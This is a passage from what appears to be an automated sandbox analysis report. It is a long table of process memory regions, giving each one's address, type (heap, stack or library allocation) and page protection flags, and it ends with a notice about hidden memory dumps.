heap
|
page read and write
|
||
|
21080128000
|
trusted library allocation
|
page read and write
|
||
|
E5B743B000
|
stack
|
page read and write
|
||
|
229366E0000
|
heap
|
page read and write
|
||
|
2293497C000
|
heap
|
page read and write
|
||
|
22936237000
|
heap
|
page read and write
|
||
|
2293617A000
|
heap
|
page read and write
|
||
|
229366FD000
|
heap
|
page read and write
|
||
|
3745D7E000
|
stack
|
page read and write
|
||
|
22936725000
|
heap
|
page read and write
|
||
|
22936164000
|
heap
|
page read and write
|
||
|
2293670E000
|
heap
|
page read and write
|
||
|
229366FC000
|
heap
|
page read and write
|
||
|
3745DFE000
|
stack
|
page read and write
|
||
|
229361A7000
|
heap
|
page read and write
|
||
|
229366DD000
|
heap
|
page read and write
|
||
|
22936215000
|
heap
|
page read and write
|
||
|
229361D1000
|
heap
|
page read and write
|
||
|
229366A6000
|
heap
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
22936231000
|
heap
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
2293670B000
|
heap
|
page read and write
|
||
|
21090010000
|
trusted library allocation
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
210EEBEA000
|
heap
|
page read and write
|
||
|
2293622A000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
229366C9000
|
heap
|
page read and write
|
||
|
21080581000
|
trusted library allocation
|
page read and write
|
||
|
22936761000
|
heap
|
page read and write
|
||
|
2B57D476000
|
heap
|
page read and write
|
||
|
2B57BA50000
|
trusted library allocation
|
page read and write
|
||
|
2B57BE00000
|
heap
|
page read and write
|
||
|
22936178000
|
heap
|
page read and write
|
||
|
22936241000
|
heap
|
page read and write
|
||
|
2293677D000
|
heap
|
page read and write
|
||
|
210803ED000
|
trusted library allocation
|
page read and write
|
||
|
2B57BE04000
|
heap
|
page read and write
|
||
|
229366BC000
|
heap
|
page read and write
|
||
|
229366FF000
|
heap
|
page read and write
|
||
|
22934813000
|
heap
|
page read and write
|
||
|
2293667C000
|
heap
|
page read and write
|
||
|
374627E000
|
stack
|
page read and write
|
||
|
2B5102ED000
|
trusted library allocation
|
page read and write
|
||
|
22934829000
|
heap
|
page read and write
|
||
|
2293672D000
|
heap
|
page read and write
|
||
|
22934769000
|
heap
|
page read and write
|
||
|
229366B7000
|
heap
|
page read and write
|
||
|
210ECCD0000
|
heap
|
page read and write
|
||
|
229366C2000
|
heap
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
229366C8000
|
heap
|
page read and write
|
||
|
22934781000
|
heap
|
page read and write
|
||
|
7FF848EC2000
|
trusted library allocation
|
page read and write
|
||
|
21080023000
|
trusted library allocation
|
page read and write
|
||
|
229366B3000
|
heap
|
page read and write
|
||
|
22936709000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
22934821000
|
heap
|
page read and write
|
||
|
22938010000
|
trusted library allocation
|
page read and write
|
||
|
22936706000
|
heap
|
page read and write
|
||
|
229366A8000
|
heap
|
page read and write
|
||
|
229346F0000
|
heap
|
page read and write
|
||
|
210ECC1B000
|
heap
|
page read and write
|
||
|
2293670A000
|
heap
|
page read and write
|
||
|
21080125000
|
trusted library allocation
|
page read and write
|
||
|
2293618C000
|
heap
|
page read and write
|
||
|
22936237000
|
heap
|
page read and write
|
||
|
7FF848CE4000
|
trusted library allocation
|
page read and write
|
||
|
2293669F000
|
heap
|
page read and write
|
||
|
22934813000
|
heap
|
page read and write
|
||
|
229366FD000
|
heap
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
229366C7000
|
heap
|
page read and write
|
||
|
2B57D940000
|
heap
|
page execute and read and write
|
||
|
22934834000
|
heap
|
page read and write
|
||
|
229366DB000
|
heap
|
page read and write
|
||
|
210EEE78000
|
heap
|
page read and write
|
||
|
229366A8000
|
heap
|
page read and write
|
||
|
FA9A5FB000
|
stack
|
page read and write
|
||
|
210800A7000
|
trusted library allocation
|
page read and write
|
||
|
229366F2000
|
heap
|
page read and write
|
||
|
229366EF000
|
heap
|
page read and write
|
||
|
2293619D000
|
heap
|
page read and write
|
||
|
2293481C000
|
heap
|
page read and write
|
||
|
7DF4FB160000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B501AE3000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
2B57BB53000
|
heap
|
page read and write
|
||
|
2293618C000
|
heap
|
page read and write
|
||
|
2293622E000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
2B57BAE5000
|
heap
|
page read and write
|
||
|
210EF100000
|
heap
|
page read and write
|
||
|
210ECC60000
|
heap
|
page read and write
|
||
|
3745FFC000
|
stack
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
2293477F000
|
heap
|
page read and write
|
||
|
210ECC21000
|
heap
|
page read and write
|
||
|
2B57DBC0000
|
heap
|
page read and write
|
||
|
229366FD000
|
heap
|
page read and write
|
||
|
2293476E000
|
heap
|
page read and write
|
||
|
22936772000
|
heap
|
page read and write
|
||
|
7FF848D2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
210ECD00000
|
trusted library allocation
|
page read and write
|
||
|
2293676A000
|
heap
|
page read and write
|
||
|
210EEE80000
|
heap
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
210803FF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D9C000
|
trusted library allocation
|
page execute and read and write
|
||
|
229361B7000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
2B500C2E000
|
trusted library allocation
|
page read and write
|
||
|
229366DA000
|
heap
|
page read and write
|
||
|
2293671C000
|
heap
|
page read and write
|
||
|
2B57BA73000
|
heap
|
page read and write
|
||
|
229361C7000
|
heap
|
page read and write
|
||
|
2B57D7F3000
|
trusted library allocation
|
page read and write
|
||
|
229366C7000
|
heap
|
page read and write
|
||
|
229366E7000
|
heap
|
page read and write
|
||
|
22936233000
|
heap
|
page read and write
|
||
|
229366C9000
|
heap
|
page read and write
|
||
|
229361A8000
|
heap
|
page read and write
|
||
|
2B57DB22000
|
heap
|
page read and write
|
||
|
2B57DA70000
|
heap
|
page execute and read and write
|
||
|
2293622E000
|
heap
|
page read and write
|
||
|
229366BF000
|
heap
|
page read and write
|
||
|
229361C7000
|
heap
|
page read and write
|
||
|
22936226000
|
heap
|
page read and write
|
||
|
2293618F000
|
heap
|
page read and write
|
||
|
2293672E000
|
heap
|
page read and write
|
||
|
22936194000
|
heap
|
page read and write
|
||
|
2293477F000
|
heap
|
page read and write
|
||
|
229361C5000
|
heap
|
page read and write
|
||
|
2B57DD9D000
|
heap
|
page read and write
|
||
|
229366D9000
|
heap
|
page read and write
|
||
|
229366A8000
|
heap
|
page read and write
|
||
|
22936231000
|
heap
|
page read and write
|
||
|
229361CA000
|
heap
|
page read and write
|
||
|
22936177000
|
heap
|
page read and write
|
||
|
2B57BAAD000
|
heap
|
page read and write
|
||
|
2293622B000
|
heap
|
page read and write
|
||
|
22936224000
|
heap
|
page read and write
|
||
|
7FF848D8C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B57BABF000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
229366C3000
|
heap
|
page read and write
|
||
|
2293622E000
|
heap
|
page read and write
|
||
|
21080050000
|
trusted library allocation
|
page read and write
|
||
|
22936231000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
229366E6000
|
heap
|
page read and write
|
||
|
22936164000
|
heap
|
page read and write
|
||
|
2293481C000
|
heap
|
page read and write
|
||
|
2B57B9D0000
|
heap
|
page read and write
|
||
|
37462FB000
|
stack
|
page read and write
|
||
|
22934809000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
210ECBD0000
|
heap
|
page read and write
|
||
|
2293677D000
|
heap
|
page read and write
|
||
|
229366B2000
|
heap
|
page read and write
|
||
|
2B57DAC3000
|
heap
|
page read and write
|
||
|
229366EA000
|
heap
|
page read and write
|
||
|
229366D9000
|
heap
|
page read and write
|
||
|
7FF848DB6000
|
trusted library allocation
|
page execute and read and write
|
||
|
22936701000
|
heap
|
page read and write
|
||
|
229366C4000
|
heap
|
page read and write
|
||
|
2B501718000
|
trusted library allocation
|
page read and write
|
||
|
229361C7000
|
heap
|
page read and write
|
||
|
2293672D000
|
heap
|
page read and write
|
||
|
22936156000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
229361D3000
|
heap
|
page read and write
|
||
|
E5B7E8C000
|
stack
|
page read and write
|
||
|
22936231000
|
heap
|
page read and write
|
||
|
2293622B000
|
heap
|
page read and write
|
||
|
229366E0000
|
heap
|
page read and write
|
||
|
2293670B000
|
heap
|
page read and write
|
||
|
2293615A000
|
heap
|
page read and write
|
||
|
229361C0000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
2293617A000
|
heap
|
page read and write
|
||
|
22934809000
|
heap
|
page read and write
|
||
|
22936761000
|
heap
|
page read and write
|
||
|
22936768000
|
heap
|
page read and write
|
||
|
E5B6FF9000
|
stack
|
page read and write
|
||
|
229361C4000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
22936709000
|
heap
|
page read and write
|
||
|
22936231000
|
heap
|
page read and write
|
||
|
229366D9000
|
heap
|
page read and write
|
||
|
229366BD000
|
heap
|
page read and write
|
||
|
2293670B000
|
heap
|
page read and write
|
||
|
2293482C000
|
heap
|
page read and write
|
||
|
2293617F000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229366EF000
|
heap
|
page read and write
|
||
|
2B57BAE7000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229366AF000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
22936789000
|
heap
|
page read and write
|
||
|
2293482A000
|
heap
|
page read and write
|
||
|
210EEE70000
|
heap
|
page read and write
|
||
|
2293615A000
|
heap
|
page read and write
|
||
|
22936782000
|
heap
|
page read and write
|
||
|
22936768000
|
heap
|
page read and write
|
||
|
229361D0000
|
heap
|
page read and write
|
||
|
22936705000
|
heap
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
|
22934710000
|
heap
|
page read and write
|
||
|
22936231000
|
heap
|
page read and write
|
||
|
210ECD30000
|
heap
|
page readonly
|
||
|
E5B6EFE000
|
stack
|
page read and write
|
||
|
210EE5D0000
|
heap
|
page read and write
|
||
|
2B57DB1D000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293671F000
|
heap
|
page read and write
|
||
|
229366F5000
|
heap
|
page read and write
|
||
|
FA99FFF000
|
stack
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
21090073000
|
trusted library allocation
|
page read and write
|
||
|
22936217000
|
heap
|
page read and write
|
||
|
7FF848D86000
|
trusted library allocation
|
page read and write
|
||
|
22936762000
|
heap
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
|
229366C3000
|
heap
|
page read and write
|
||
|
22936314000
|
heap
|
page read and write
|
||
|
210ECBE5000
|
heap
|
page read and write
|
||
|
229366C7000
|
heap
|
page read and write
|
||
|
E5B723E000
|
stack
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
229366EF000
|
heap
|
page read and write
|
||
|
229366A0000
|
heap
|
page read and write
|
||
|
2B501706000
|
trusted library allocation
|
page read and write
|
||
|
2B57DB7A000
|
heap
|
page read and write
|
||
|
22934809000
|
heap
|
page read and write
|
||
|
7FF848CEB000
|
trusted library allocation
|
page read and write
|
||
|
21080412000
|
trusted library allocation
|
page read and write
|
||
|
2B57DBE0000
|
heap
|
page read and write
|
||
|
E5B6C7D000
|
stack
|
page read and write
|
||
|
2108010E000
|
trusted library allocation
|
page read and write
|
||
|
229366E7000
|
heap
|
page read and write
|
||
|
229366F1000
|
heap
|
page read and write
|
||
|
2293617E000
|
heap
|
page read and write
|
||
|
229366DD000
|
heap
|
page read and write
|
||
|
2293615F000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
FA9A3FE000
|
stack
|
page read and write
|
||
|
2293617A000
|
heap
|
page read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
229361A8000
|
heap
|
page read and write
|
||
|
2293618C000
|
heap
|
page read and write
|
||
|
E5B71B8000
|
stack
|
page read and write
|
||
|
229366E0000
|
heap
|
page read and write
|
||
|
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
|
2B510010000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
2B57BDE0000
|
heap
|
page readonly
|
||
|
22936241000
|
heap
|
page read and write
|
||
|
210EED70000
|
heap
|
page read and write
|
||
|
22936960000
|
heap
|
page read and write
|
||
|
22936237000
|
heap
|
page read and write
|
||
|
2293622E000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22934824000
|
heap
|
page read and write
|
||
|
229361C4000
|
heap
|
page read and write
|
||
|
229366BB000
|
heap
|
page read and write
|
||
|
E5B703F000
|
stack
|
page read and write
|
||
|
22934813000
|
heap
|
page read and write
|
||
|
229361C7000
|
heap
|
page read and write
|
||
|
2293621E000
|
heap
|
page read and write
|
||
|
3745C7E000
|
stack
|
page read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
229366F5000
|
heap
|
page read and write
|
||
|
FA9A0FE000
|
stack
|
page read and write
|
||
|
2293667F000
|
heap
|
page read and write
|
||
|
7FF848CE0000
|
trusted library allocation
|
page read and write
|
||
|
229366EA000
|
heap
|
page read and write
|
||
|
3745E7E000
|
stack
|
page read and write
|
||
|
2293481B000
|
heap
|
page read and write
|
||
|
22936732000
|
heap
|
page read and write
|
||
|
21080001000
|
trusted library allocation
|
page read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
2B57BA9F000
|
heap
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
|
229366D8000
|
heap
|
page read and write
|
||
|
229366D9000
|
heap
|
page read and write
|
||
|
2B57DB30000
|
heap
|
page read and write
|
||
|
7FF848DC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B57D470000
|
heap
|
page read and write
|
||
|
22936241000
|
heap
|
page read and write
|
||
|
22936761000
|
heap
|
page read and write
|
||
|
229361AE000
|
heap
|
page read and write
|
||
|
2B5016F2000
|
trusted library allocation
|
page read and write
|
||
|
2B57DCC0000
|
heap
|
page read and write
|
||
|
229361C4000
|
heap
|
page read and write
|
||
|
229366F5000
|
heap
|
page read and write
|
||
|
229366F2000
|
heap
|
page read and write
|
||
|
22936772000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
229366A5000
|
heap
|
page read and write
|
||
|
22936217000
|
heap
|
page read and write
|
||
|
229366A8000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
2B5016ED000
|
trusted library allocation
|
page read and write
|
||
|
229366B6000
|
heap
|
page read and write
|
||
|
2B510073000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
2293615D000
|
heap
|
page read and write
|
||
|
22936237000
|
heap
|
page read and write
|
||
|
3745883000
|
stack
|
page read and write
|
||
|
2293672D000
|
heap
|
page read and write
|
||
|
229366FD000
|
heap
|
page read and write
|
||
|
2293669F000
|
heap
|
page read and write
|
||
|
229366B6000
|
heap
|
page read and write
|
||
|
2293618C000
|
heap
|
page read and write
|
||
|
2293677D000
|
heap
|
page read and write
|
||
|
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
|
22936168000
|
heap
|
page read and write
|
||
|
2B57D960000
|
heap
|
page read and write
|
||
|
229366BD000
|
heap
|
page read and write
|
||
|
7FF848E94000
|
trusted library allocation
|
page read and write
|
||
|
229366EF000
|
heap
|
page read and write
|
||
|
210EED60000
|
heap
|
page execute and read and write
|
||
|
22936191000
|
heap
|
page read and write
|
||
|
2B57BDF0000
|
trusted library allocation
|
page read and write
|
||
|
229366DD000
|
heap
|
page read and write
|
||
|
374617E000
|
stack
|
page read and write
|
||
|
22934747000
|
heap
|
page read and write
|
||
|
22936709000
|
heap
|
page read and write
|
||
|
2B500001000
|
trusted library allocation
|
page read and write
|
||
|
2293476F000
|
heap
|
page read and write
|
||
|
21080424000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
229366F1000
|
heap
|
page read and write
|
||
|
22936789000
|
heap
|
page read and write
|
||
|
E5B70B7000
|
stack
|
page read and write
|
||
|
2108001D000
|
trusted library allocation
|
page read and write
|
||
|
229366B0000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
210EECA9000
|
heap
|
page read and write
|
||
|
229366C2000
|
heap
|
page read and write
|
||
|
22936217000
|
heap
|
page read and write
|
||
|
22936772000
|
heap
|
page read and write
|
||
|
2293678B000
|
heap
|
page read and write
|
||
|
229361C7000
|
heap
|
page read and write
|
||
|
7FF848CE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2109004B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
22936703000
|
heap
|
page read and write
|
||
|
22936725000
|
heap
|
page read and write
|
||
|
2293617A000
|
heap
|
page read and write
|
||
|
229361CD000
|
heap
|
page read and write
|
||
|
229366B2000
|
heap
|
page read and write
|
||
|
210EEC41000
|
heap
|
page read and write
|
||
|
229366B2000
|
heap
|
page read and write
|
||
|
2293617A000
|
heap
|
page read and write
|
||
|
21080122000
|
trusted library allocation
|
page read and write
|
||
|
FA99DFE000
|
stack
|
page read and write
|
||
|
21080133000
|
trusted library allocation
|
page read and write
|
||
|
22936310000
|
heap
|
page read and write
|
||
|
229361CA000
|
heap
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
229366B5000
|
heap
|
page read and write
|
||
|
210EEAC0000
|
heap
|
page execute and read and write
|
||
|
2293678B000
|
heap
|
page read and write
|
||
|
210ECD20000
|
trusted library allocation
|
page read and write
|
||
|
2293623B000
|
heap
|
page read and write
|
||
|
2B57E040000
|
heap
|
page read and write
|
||
|
229366FD000
|
heap
|
page read and write
|
||
|
22936233000
|
heap
|
page read and write
|
||
|
210ECB60000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
22936710000
|
heap
|
page read and write
|
||
|
229366F2000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
22936703000
|
heap
|
page read and write
|
||
|
2293622E000
|
heap
|
page read and write
|
||
|
2293615D000
|
heap
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
229366E6000
|
heap
|
page read and write
|
||
|
2B57DAC0000
|
heap
|
page read and write
|
||
|
2B57DCCA000
|
heap
|
page read and write
|
||
|
22936718000
|
heap
|
page read and write
|
||
|
2293621E000
|
heap
|
page read and write
|
||
|
22936785000
|
heap
|
page read and write
|
||
|
E5B6D7E000
|
stack
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
22934819000
|
heap
|
page read and write
|
||
|
22936175000
|
heap
|
page read and write
|
||
|
229366D9000
|
heap
|
page read and write
|
||
|
2293622E000
|
heap
|
page read and write
|
||
|
22934979000
|
heap
|
page read and write
|
||
|
229366BE000
|
heap
|
page read and write
|
||
|
2293617A000
|
heap
|
page read and write
|
||
|
210803D6000
|
trusted library allocation
|
page read and write
|
||
|
210ECC17000
|
heap
|
page read and write
|
||
|
3745F77000
|
stack
|
page read and write
|
||
|
229361A9000
|
heap
|
page read and write
|
||
|
229361D1000
|
heap
|
page read and write
|
||
|
210801F2000
|
trusted library allocation
|
page read and write
|
||
|
22936761000
|
heap
|
page read and write
|
||
|
229366A5000
|
heap
|
page read and write
|
||
|
7FF848CD4000
|
trusted library allocation
|
page read and write
|
||
|
FA99CFE000
|
stack
|
page read and write
|
||
|
229361D0000
|
heap
|
page read and write
|
||
|
E5B6F7E000
|
stack
|
page read and write
|
||
|
210EE695000
|
heap
|
page read and write
|
||
|
2B57D474000
|
heap
|
page read and write
|
||
|
2B57DBAA000
|
heap
|
page read and write
|
||
|
229366A9000
|
heap
|
page read and write
|
||
|
229366F2000
|
heap
|
page read and write
|
||
|
229366E3000
|
heap
|
page read and write
|
||
|
210EED90000
|
heap
|
page read and write
|
||
|
2B57DAC7000
|
heap
|
page read and write
|
||
|
FA99965000
|
stack
|
page read and write
|
||
|
229366F2000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
229347AF000
|
heap
|
page read and write
|
||
|
22936660000
|
heap
|
page read and write
|
||
|
229366B6000
|
heap
|
page read and write
|
||
|
2293671C000
|
heap
|
page read and write
|
||
|
22936180000
|
heap
|
page read and write
|
||
|
22936782000
|
heap
|
page read and write
|
||
|
2293616B000
|
heap
|
page read and write
|
||
|
229361AB000
|
heap
|
page read and write
|
||
|
210EECD9000
|
heap
|
page read and write
|
||
|
229361BD000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
229366C4000
|
heap
|
page read and write
|
||
|
229366E5000
|
heap
|
page read and write
|
||
|
2B510001000
|
trusted library allocation
|
page read and write
|
||
|
229366BF000
|
heap
|
page read and write
|
||
|
22936237000
|
heap
|
page read and write
|
||
|
229366D8000
|
heap
|
page read and write
|
||
|
7FF848E9A000
|
trusted library allocation
|
page read and write
|
||
|
22936700000
|
heap
|
page read and write
|
||
|
22936163000
|
heap
|
page read and write
|
||
|
22936150000
|
heap
|
page read and write
|
||
|
229361D0000
|
heap
|
page read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
229366A8000
|
heap
|
page read and write
|
||
|
210EE690000
|
heap
|
page read and write
|
||
|
22936191000
|
heap
|
page read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
21090001000
|
trusted library allocation
|
page read and write
|
||
|
229366F3000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
7FF848CD2000
|
trusted library allocation
|
page read and write
|
||
|
22936231000
|
heap
|
page read and write
|
||
|
22936170000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
There are 766 hidden memdumps, click here to show them.